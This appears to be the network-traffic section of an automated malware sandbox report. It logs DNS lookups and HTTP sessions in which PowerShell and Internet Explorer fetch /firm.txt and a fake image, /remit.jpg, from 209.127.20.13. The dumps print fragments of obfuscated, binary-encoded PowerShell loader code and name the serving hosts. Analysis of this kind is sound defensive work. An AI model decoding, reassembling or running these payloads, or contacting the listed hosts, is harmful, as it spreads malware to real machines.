                Aug 26, 2022 00:13:45.827950001 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.827980042 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:45.827989101 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.828003883 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:45.828007936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.828047037 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:45.828119040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:45.828170061 CEST4917480192.168.2.22209.127.20.13

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 26, 2022 00:13:08.543957949 CEST5586853192.168.2.228.8.8.8
                Aug 26, 2022 00:13:08.562979937 CEST53558688.8.8.8192.168.2.22
                Aug 26, 2022 00:13:21.325611115 CEST5883653192.168.2.228.8.8.8
                Aug 26, 2022 00:13:21.346823931 CEST53588368.8.8.8192.168.2.22
                Aug 26, 2022 00:13:21.353519917 CEST5013453192.168.2.228.8.8.8
                Aug 26, 2022 00:13:21.374419928 CEST53501348.8.8.8192.168.2.22
                Aug 26, 2022 00:13:28.494937897 CEST5527553192.168.2.228.8.8.8
                Aug 26, 2022 00:13:28.556293964 CEST53552758.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Aug 26, 2022 00:13:08.543957949 CEST192.168.2.228.8.8.80x23aStandard query (0)kopadd.yunethosting.rsA (IP address)IN (0x0001)
                Aug 26, 2022 00:13:21.325611115 CEST192.168.2.228.8.8.80x40aeStandard query (0)google.comA (IP address)IN (0x0001)
                Aug 26, 2022 00:13:21.353519917 CEST192.168.2.228.8.8.80x220Standard query (0)google.comA (IP address)IN (0x0001)
                Aug 26, 2022 00:13:28.494937897 CEST192.168.2.228.8.8.80x46e7Standard query (0)kopadd.yunethosting.rsA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Aug 26, 2022 00:13:08.562979937 CEST8.8.8.8192.168.2.220x23aNo error (0)kopadd.yunethosting.rs194.247.196.66A (IP address)IN (0x0001)
                Aug 26, 2022 00:13:21.346823931 CEST8.8.8.8192.168.2.220x40aeNo error (0)google.com142.250.184.78A (IP address)IN (0x0001)
                Aug 26, 2022 00:13:21.374419928 CEST8.8.8.8192.168.2.220x220No error (0)google.com142.250.184.78A (IP address)IN (0x0001)
                Aug 26, 2022 00:13:28.556293964 CEST8.8.8.8192.168.2.220x46e7No error (0)kopadd.yunethosting.rs194.247.196.66A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • kopadd.yunethosting.rs
                • 209.127.20.13

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249171194.247.196.66443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249175194.247.196.66443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampkBytes transferredDirectionData


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249172209.127.20.1380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                TimestampkBytes transferredDirectionData
                Aug 26, 2022 00:13:15.295965910 CEST8OUTGET /firm.txt HTTP/1.1
                Accept: text/html, application/xhtml+xml, */*
                Accept-Language: en-US
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Accept-Encoding: gzip, deflate
                Host: 209.127.20.13
                DNT: 1
                Connection: Keep-Alive
                Aug 26, 2022 00:13:15.406044006 CEST10INHTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:16 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Wed, 24 Aug 2022 13:51:24 GMT
                ETag: "12d0-5e6fcfa067569"
                Accept-Ranges: bytes
                Content-Length: 4816
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/plain
                Data Raw: 24 67 66 3d 28 30 30 31 30 30 31 30 30 2c 30 31 30 30 30 31 30 31 2c 30 31 31 31 30 30 31 30 2c 30 31 31 31 30 30 31 30 2c 30 31 31 30 31 31 31 31 2c 30 31 31 31 30 30 31 30 2c 30 31 30 30 30 30 30 31 2c 30 31 31 30 30 30 31 31 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 31 30 30 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 31 30 2c 30 31 30 31 30 30 30 30 2c 30 31 31 31 30 30 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 30 31 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 31 30 30 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 30 30 30 31 31 2c 30 31 31 30 30 31 30 31 2c 30 30 31 30 30 30 30 30 2c 30 30 31 31 31 31 30 31 2c 30 30 31 30 30 30 30 30 2c 30 30 31 30 30 31 31 31 2c 30 31 30 31 30 30 31 31 2c 30 31 31 30 31 30 30 31 2c 30 31 31 30 31 31 30 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 31 31 30 30 2c 30 31 31 31 31 30 30 31 2c 30 31 30 30 30 30 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 31 30 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 31 30 31 30 31 2c 30 31 31 30 30 31 30 31 2c 30 30 31 30 30 31 31 31 2c 30 30 31 31 31 30 31 31 2c 30 30 31 30 30 31 30 30 2c 30 31 31 31 30 31 30 30 2c 30 30 31 31 30 31 30 31 2c 30 30 31 31 30 31 31 30 2c 30 31 31 30 30 31 31 30 2c 30 31 31 30 30 31 31 31 2c 30 30 31 30 30 30 30 30 2c 30 30 31 31 31 31 30 31 2c 30 30 31 30 30 30 30 30 2c 30 31 30 31 31 30 31 31 2c 30 31 30 30 30 31 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 31 30 31 30 31 2c 30 31 31 30 31 31 30 31 2c 30 31 30 31 31 31 30 31 2c 30 30 31 31 31 30 31 30 2c 30 30 31 31 31 30 31 30 2c 30 31 30 31 30 31 30 30 2c 30 31 31 30 31 31 31 31 2c 30 31 30 30 31 31 31 31 2c 30 31 31 30 30 30 31 30 2c 30 31 31 30 31 30 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 30 30 31 31 2c 30 31 31 31 30 31 30 30 2c 30 30 31 30 31 30 30 30 2c 30 31 30 31 31 30 31 31 2c 30 31 30 31 30 30 31 31 2c 30 31 31 31 31 30 30 31 2c 30 31 31 31 30 30 31 31 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 31 31 30 31 2c 30 30 31 30 31 31 31 30 2c 30 31 30 30 31 31 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 31 30 31 30 30 2c 30 30 31 30 31 31 31 30 2c 30 31 30 31 30 30 31 31 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 30 30 31 31 2c 30 31 31 31 30 31 30 31 2c 30 31 31 31 30 30 31 30 2c 30 31 31 30 31 30 30 31 2c 30 31 31 31 30 31 30 30 2c 30 31 31 31 31 30 30 31 2c 30 31 30 31 30 30 30 30 2c 30 31 31 31 30 30 31 30 2c 30 31 31 30 31 31 31 31 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 30 30 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 30 30 2c 30 31 30 31 30 31 30 30 2c 30 31 31 31 31 30 30 31 2c 30 31 31 31 30 30 30 30 2c 30 31 31 30 30 31 30 31 2c 30 31 30 31 31 31 30 31 2c 30 30 31 30 31 31 30 30 2c 30 30 31 30 30 30 30 30 2c 30 30 31 31 30 30 31 31 2c 30 30 31 31 30 30 30 30 2c 30 30 31 31 30 31 31 31 2c 30 30 31 31 30 30 31 30 2c 30 30 31 30 31 30 30 31 2c 30 30 31 31 31 30 31 31 2c 30 31 30 31 31 30 31 31 2c 30 31 30 31 30 30 31 31 2c 30 31 31 31
                Data Ascii: $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,0111
                Aug 26, 2022 00:13:15.406085968 CEST11INData Raw: 31 30 30 31 2c 30 31 31 31 30 30 31 31 2c 30 31 31 31 30 31 30 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 30 31 31 30 31 2c 30 30 31 30 31 31 31 30 2c 30 31 30 30 31 31 31 30 2c 30 31 31 30 30 31 30 31 2c 30 31 31 31 30 31 30 30 2c 30 30 31 30 31
                Data Ascii: 1001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,0110
                Aug 26, 2022 00:13:15.406114101 CEST12INData Raw: 31 31 30 30 30 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 31 30 31 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 31 30 31 30 30 2c 30 30 31 30 30 30 30 30 2c 30 30 31 31 30 30 30 31 2c 30 30 31 30 30 30 30 30 2c 30 30 31 30 31 31 30 31 2c 30 31
                Data Ascii: 1100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,0
                Aug 26, 2022 00:13:15.406138897 CEST14INData Raw: 30 2c 30 30 31 30 30 31 31 31 2c 30 31 31 30 31 31 30 30 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 30 30 30 31 2c 30 31 31 30 30 31 30 30 2c 30 30 31 30 30 31 31 31 2c 30 30 31 30 30 30 30 30 2c 30 30 31 30 31 30 31 31 2c 30 30 31 30 30 30 30 30
                Data Ascii: 0,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,0110001
                Aug 26, 2022 00:13:17.479048014 CEST14OUTGET /favicon.ico HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: 209.127.20.13
                DNT: 1
                Connection: Keep-Alive
                Aug 26, 2022 00:13:17.590606928 CEST15INHTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:18 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
                ETag: "78ae-51affc7a4c400"
                Accept-Ranges: bytes
                Content-Length: 30894
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: image/x-icon
                Data Raw: 00 00 01 00 03 00 40 40 00 00 01 00 20 00 28 42 00 00 36 00 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 5e 42 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 06 68 00 00 28 00 00 00 40 00 00 00 80 00 00 00 01 00 20 00 00 00 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 a5 bd 00 94 a5 bd 00 9f aa b9 03 75 8f b5 48 43 70 b2 83 41 6f b5 b4 36 6b b9 b8 25 61 bb bb 36 6b ba ec 39 6e bd f0 38 6e c0 f0 37 6e c1 f0 37 6f c3 f0 36 6f c3 f0 36 6f c4 f0 36 6f c4 f0 36 6f c5 f0 36 6f c5 f0 36 6f c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 70 c5 f0 36 6f c5 f0 36 6f c5 f0 36 6f c4 f0 36 6f c4 f0 36 6f c3 f0 37 6f c3 f0 37 6e c2 f0 37 6e c0 f0 38 6e be f0 3a 6d ba f0 33 69 ba d4 30 68 ba b8 43 71 b5 b8 49 73 b2 9c 62 83 b5 60 9b a7 b8 0a ae b3 bd 00 b0 b6 bf 00 94 a5 bd 00 97 a7 be 0a 60 82 b3 bd 25 5c ae ff 19 57 b4 ff 13 56 ba ff 16 5a bf ff 19 5d c4 ff 17 5e c7 ff 17 5f ca ff 18 61 cd ff 18 61 cf ff 18 62 d0 ff 19 62 d0 ff 19 63 d1 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 19 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d2 ff 18 63 d1 ff 19 62 d1 ff 18 62 d0 ff 18 62 cf ff 18 60 cd ff 17 60 cb ff 16 5e c9 ff 17 5d c5 ff 17 5b c1 ff 13 56 bb ff 15 55 b5 ff 1e 58 af ff 4d 74 b0 dd a6 af bd 43 b2 b7 bf 00 7f 97 bd 00 5b 7f b5 96 14 50 ab ff 14 54 b3 ff 19 5b bc ff 1b 5f c3 ff 1b 61 c8 ff 1c 63 cd ff 1c 64 d0 ff 1d 66 d3 ff 1d 68 d6 ff 1d 68 d8 ff 1d 68 d9 ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 db ff 1e 69 da ff 1e 69 da ff 1e 69 da ff 1d 68 d9 ff 1d 68 d8 ff 1d 67 d6 ff 1d 66 d4 ff 1c 65 d2 ff 1c 63 ce ff 1c 61 ca ff 1b 5f c5 ff 19 5c bd ff 17 57 b6 ff 0d 4d ac ff 4c 75 b1 d9 9b a9 c0 07 6f 8d bb 0b 2c 61 ae e6 13 52 b0 ff 1a 5b bb ff 1b 5e c3 ff 1c 62 c9 ff 1c 64 d0 ff 1d 67 d5 ff 1e 68 d8 ff 1e 6a db ff 1e 6b dd ff 1e 6c df ff 1f 6c e0 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e
                Data Ascii: @@ (B600 %^B h(@ BuHCpAo6k%a6k9n8n7n7o6o6o6o6o6o6o6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6p6o6o6o6o6o7o7n7n8n:m3i0hCqIsb``%\WVZ]^_aabbccccccccccccccccccccccccccccccccccccbbb``^][VUXMtC[PT[_acdfhhhiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiihhgfeca_\WMLuo,aR[^bdghjkllmmmmmmnnnnnnnnnnnnnnnnnnnnnn
                Aug 26, 2022 00:13:17.590651989 CEST17INData Raw: e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6e e2 ff 1f 6d e2 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e1 ff 1f 6d e0 ff 1e 6c df ff 1e 6b de ff 1e 6a dc ff 1e 69 d9 ff 1d 67 d6 ff 1d 65 d1 ff 1c 63 cb ff 1b 5f c4 ff 1a 5c bd ff
                Data Ascii: nnnnmmmmmmmlkjigec_\UWv^aYW]adgjkmnopo p p p p q p p p p p p p p p p p p p p p p p p
                Aug 26, 2022 00:13:17.590677023 CEST18INData Raw: 20 73 ed ff 20 71 ea ff 1f 6f e5 ff 1f 6c df ff 1e 69 d9 ff 1c 65 d0 ff 1b 60 c6 ff 14 56 ba ff 3e 6f b6 f0 4e 79 b9 f0 12 54 b7 ff 1b 5f c5 ff 1c 64 cf ff 1d 68 d8 ff 1e 6c df ff 1f 6f e5 ff 20 71 ea ff 21 73 ee ff 21 75 f1 ff 21 76 f3 ff 21 77
                Data Ascii: s qolie`V>oNyT_dhlo q!s!u!v!w!w!w!w!w"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x"x!w!w!w!w
                Aug 26, 2022 00:13:17.590703964 CEST19INData Raw: e2 ff 20 70 e9 ff 20 73 ed ff 21 74 f1 ff 21 76 f4 ff 21 77 f6 ff 16 71 f7 ff 59 99 fa ff e7 f0 fd ff ff ff fe ff ff ff fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff
                Data Ascii: p s!t!v!wqY(|v"y"y"y"yr_qu!u!s qokgbY3hBrW
                Aug 26, 2022 00:13:17.590728998 CEST21INData Raw: 9f c5 fc ff a9 ca fc ff de ea fd ff ff ff fe ff ff fe fe ff fe fe fe ff fe fe fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ed f4 ff ff 2c 7f fc ff a1 c6 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fe fe ff fe fe fe ff fe fe
                Data Ascii: ,#tpokgbZ2hAqW`ejm prr
                Aug 26, 2022 00:13:17.590753078 CEST22INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c1 d9 fe ff 21 78 fb ff 20 78 fa ff 22 79 fa ff 22 79 fa ff 22 79 fa ff 22 79 fa ff 13 70 fa ff 90 bc fc ff ff ff fe ff fe fe fe ff fd fd fd ff fc fc fc ff fb fb fb ff f9 f9 f9 ff
                Data Ascii: !x x"y"y"y"ypnnkgb[1hAqWaejn po9Mu"y"y"y"y x"y
                Aug 26, 2022 00:13:17.590778112 CEST23INData Raw: ff ff fe ff fe fe fe ff fe fe fe ff fc fc fc ff fe fe fb ff e1 ea f9 ff 37 82 f3 ff 1c 70 ef ff 20 71 eb ff 1f 6f e4 ff 1e 6b de ff 1d 67 d6 ff 1c 62 cc ff 17 5b c0 ff 31 68 b9 f0 41 71 b9 f0 14 57 bc ff 1b 61 c9 ff 1d 65 d3 ff 1e 6a dc ff 1f 6e
                Data Ascii: 7p qokgb[1hAqWaejn q ss,}Ur"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y"y x
                Aug 26, 2022 00:13:17.701261044 CEST25INData Raw: b9 f0 41 71 b9 f0 14 57 bc ff 1b 61 c9 ff 1d 65 d3 ff 1e 6a dc ff 1f 6e e3 ff 20 70 e9 ff 20 73 ee ff 14 6d f1 ff 6a a2 f6 ff ff ff fb ff fe fd fc ff fd fd fd ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff ff ff fe ff fc fd fe ff cb df fd ff
                Data Ascii: AqWaejn p smjxxxxxxxxyqIu x"y"y"y"y"yrcQmok


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.2249174209.127.20.1380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                TimestampkBytes transferredDirectionData
                Aug 26, 2022 00:13:21.764863014 CEST48OUTGET /remit.jpg HTTP/1.1
                Host: 209.127.20.13
                Connection: Keep-Alive
                Aug 26, 2022 00:13:21.876075029 CEST49INHTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:23 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Wed, 24 Aug 2022 13:38:58 GMT
                ETag: "1c19aa-5e6fccd8fd0ee"
                Accept-Ranges: bytes
                Content-Length: 1841578
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg
                Data Raw: 24 6f 49 6c 44 3d 28 27 30 31 31 4b 31 31 30 2c 30 31 31 31 30 31 30 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 4b 30 31 31 2c 30 31 31 31 30 31 4b 2c 30 31 31 30 31 4b 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 31 30 2c 4b 31 4b 4b 30 2c 30 31 31 31 30 31 4b 2c 30 31 4b 31 31 30 31 2c 30 31 4b 4b 31 31 2c 30 31 31 4b 31 31 30 2c 30 31 31 30 31 30 31 31 2c 30 31 30 31 4b 31 31 2c 30 31 4b 30 31 4b 2c 4b 31 4b 4b 30 2c 30 31 31 31 31 30 31 31 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 4b 31 2c 30 31 30 31 31 30 31 31 2c 30 31 4b 4b 31 31 2c 30 31 31 30 31 31 30 31 2c 30 31 31 4b 31 4b 2c 30 31 31 30 31 31 4b 2c 30 31 31 4b 31 30 31 2c 30 31 31 31 30 31 4b 2c 30 31 4b 4b 31 30 2c 30 31 31 30 31 4b 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 4b 31 4b 2c 30 31 31 30 31 4b 31 2c 30 31 31 30 31 31 31 30 2c 30 31 31 4b 31 31 31 2c 4b 31 30 31 4b 30 2c 4b 31 30 31 4b 31 2c 30 31 30 31 31 31 30 31 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 30 31 30 31 4b 4b 2c 30 31 31 4b 4b 31 2c 30 31 31 31 4b 31 30 2c 30 31 31 4b 4b 31 2c 30 31 31 30 31 31 30 31 2c 4b 31 4b 4b 30 2c 4b 31 30 31 4b 30 2c 30 31 30 31 31 30 31 31 2c 30 31 31 4b 30 31 30 2c 30 31 31 31 31 4b 31 2c 30 31 31 31 30 31 4b 2c 30 31 31 4b 31 30 31 2c 30 31 30 31 31 30 31 31 2c 30 31 30 31 31 31 30 31 2c 30 31 30 31 31 31 30 31 2c 4b 31 4b 4b 30 2c 4b 31 4b 31 4b 2c 30 31 31 4b 30 31 30 2c 30 31 31 31 31 4b 31 2c 30 31 31 31 30 31 4b 2c 30 31 31 4b 31 30 31 2c 30 31 4b 4b 30 31 2c 30 31 31 31 4b 31 30 2c 30 31 31 31 4b 31 30 2c 30 31 31 4b 4b 31 2c 30 31 31 31 31 4b 31 2c 4b 31 30 31 4b 31 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 31 4b 4b 30 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 4b 31 2c 30 31 30 31 4b 4b 2c 30 31 31 31 4b 31 30 2c 30 31 31 30 31 31 31 31 2c 30 31 31 4b 30 31 31 2c 30 31 31 4b 31 30 31 2c 30 31 31 31 4b 31 31 2c 30 31 31 31 4b 31 31 2c 4b 31 4b 4b 30 2c 30 31 31 31 31 30 31 31 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 4b 31 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 31 4b 2c 30 31 31 4b 31 31 31 2c 30 31 31 30 31 30 31 31 2c 30 31 31 4b 31 4b 2c 30 31 31 4b 31 31 30 2c 4b 31 31 31 31 30 31 2c 4b 31 30 31 4b 30 2c 4b 31 4b 31 31 31 2c 4b 31 30 31 4b 30 2c 30 31 30 31 31 30 31 31 2c 30 31 4b 31 4b 31 2c 30 31 4b 31 31 31 31 2c 4b 31 30 31 31 31 30 2c 30 31 4b 4b 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 30 31 2c 30 31 31 31 4b 4b 2c 30 31 31 31 4b 31 30 2c 30 31 31 4b 31 30 31 2c 30 31 31 31 4b 31 31 2c 30 31 31 31 4b 31 31 2c 30 31 31 30 31 4b 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 31 30 2c 4b 31 30 31 31 31 30 2c 30 31 4b 4b 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 30 31 2c 30 31 31 31 4b 4b 2c 30 31 31 31 4b 31 30 2c 30 31 31 4b 31 30 31 2c 30 31 31 31 4b 31 31 2c 30 31 31 31 4b 31 31 2c 30 31 31 30 31 4b 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31 31 31 30 2c 30 31 4b 31 31 30 31 2c 30 31 31 30
                Data Ascii: $oIlD=('011K110,01110101,01101110,011K011,011101K,01101K1,01101111,01101110,K1KK0,011101K,01K1101,01KK11,011K110,01101011,0101K11,01K01K,K1KK0,01111011,KK1101,KK1010,KK1101,KK1010,KK1K1,01011011,01KK11,01101101,011K1K,011011K,011K101,011101K,01KK10,01101K1,01101110,011K1K,01101K1,01101110,011K111,K101K0,K101K1,01011101,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,0101KK,011KK1,0111K10,011KK1,01101101,K1KK0,K101K0,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01111K1,011101K,011K101,01KK01,0111K10,0111K10,011KK1,01111K1,K101K1,KK1101,KK1010,K1KK0,KK1101,KK1010,KK1K1,0101KK,0111K10,01101111,011K011,011K101,0111K11,0111K11,K1KK0,01111011,KK1101,KK1010,KK1K1,K1KK0,K1KK0,K1KK0,K1KK0,K1K1K,011K111,01101011,011K1K,011K110,K111101,K101K0,K1K111,K101K0,01011011,01K1K1,01K1111,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,K101110,01KK11,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,01101K1,01101111,01101110,01K1101,0110
                Aug 26, 2022 00:13:21.876111031 CEST51INData Raw: 31 31 31 31 2c 30 31 31 4b 31 4b 2c 30 31 31 4b 31 30 31 2c 30 31 30 31 31 31 30 31 2c 4b 31 31 31 30 31 30 2c 4b 31 31 31 30 31 30 2c 30 31 4b 30 31 4b 2c 30 31 31 4b 31 30 31 2c 30 31 31 4b 30 31 31 2c 30 31 31 30 31 31 31 31 2c 30 31 31 30 31
                Data Ascii: 1111,011K1K,011K101,01011101,K111010,K111010,01K01K,011K101,011K011,01101111,01101101,0111KK,0111K10,011K101,0111K11,0111K11,K101K1,K1K111,K101K1,011111K,01K1K1,011KK0,01K0101,011KK0,01011K0,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1
                Aug 26, 2022 00:13:21.876133919 CEST52INData Raw: 31 2c 30 31 31 4b 31 30 31 2c 30 31 31 30 31 31 30 31 2c 4b 31 30 31 31 31 30 2c 30 31 4b 31 4b 31 2c 30 31 4b 31 31 31 31 2c 4b 31 30 31 31 31 30 2c 30 31 4b 31 31 30 31 2c 30 31 31 4b 31 30 31 2c 30 31 31 30 31 31 30 31 2c 4b 31 4b 31 31 31 2c
